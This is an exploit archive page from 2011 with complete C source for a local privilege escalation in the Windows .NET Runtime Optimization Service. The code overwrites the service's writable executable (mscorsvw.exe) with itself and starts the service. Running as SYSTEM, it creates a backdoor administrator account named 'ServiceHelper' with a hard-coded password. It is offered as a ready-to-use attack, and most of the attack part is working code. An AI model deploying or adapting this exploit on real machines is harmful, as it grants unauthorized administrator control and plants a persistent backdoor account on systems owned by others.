exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

.NET Runtime Optimization Service Privilege Escalation

.NET Runtime Optimization Service Privilege Escalation
Posted Mar 8, 2011
Authored by XenoMuta

.NET runtime optimization service privilege escalation exploit that leverages the fact that the service's EXE file can be overwritten by any non-admin domain user and local power users. This exploit compiles to a service that uses the original service's id.

tags | exploit, local
SHA-256 | 744f7672e14b5f0fc0764ea74c1519e7a0ebfe6e8883fc42b8bab17499280a19

.NET Runtime Optimization Service Privilege Escalation

Change Mirror Download
/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <xenomuta@tuxfamily.org>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a

_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/

xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
https://xenomuta.tuxfamily.org/ - Methylxantina 256mg

This one's a no-brainer, plain simple:

This service's EXE file can be overwritten by any non-admin domain user
and local power users ( wich are the default permissions set ).
This exploit compiles to a service that uses the original service's id.

Tested on Windows 2003, WinXP (sp3) and Win7
( my guess is that it runs on any win box running this service ).

greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!

bless y'all!

*/
#include <stdio.h>
#include <windows.h>

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

#define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT "mscorsvw.exe"
#define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID "clr_optimization_v2.0.50727_32"

void ServiceMain(int argc, char** argv) {
if (InitService()) {
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = -1;
SetServiceStatus(hStatus, &ServiceStatus);
return;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
}

void ControlHandler(DWORD request);
int InitService();

int main(int argc, char **argv) {
char acUserName[100];
DWORD nUserName = sizeof(acUserName);
GetUserName(acUserName, &nUserName);

if (strcmp((char *)&acUserName, "SYSTEM")) {
char *str = (char *)malloc(2048);
memset(str, 0, 2048);
snprintf(str, 2048, "%s.bak", PWN_EXE);
if (rename(PWN_EXE, str) != 0) {
fprintf(stderr, " :( sorry, can't write to file.\n");
exit(1);
}
CopyFile(argv[0], PWN_EXE, !0);
snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
system(str);
}

SERVICE_TABLE_ENTRY ServiceTable[2];

ServiceTable[0].lpServiceName = PWN_ID;
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);

return 0;
}

int InitService() {
system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close